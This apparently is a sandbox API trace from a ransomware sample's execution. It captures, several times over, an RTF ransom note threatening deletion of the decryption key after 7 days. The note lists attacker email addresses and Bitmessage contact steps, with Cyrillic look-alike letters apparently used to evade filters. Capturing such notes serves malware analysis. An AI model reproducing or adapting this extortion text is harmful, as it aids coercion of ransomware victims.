\r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.662] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.662] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. 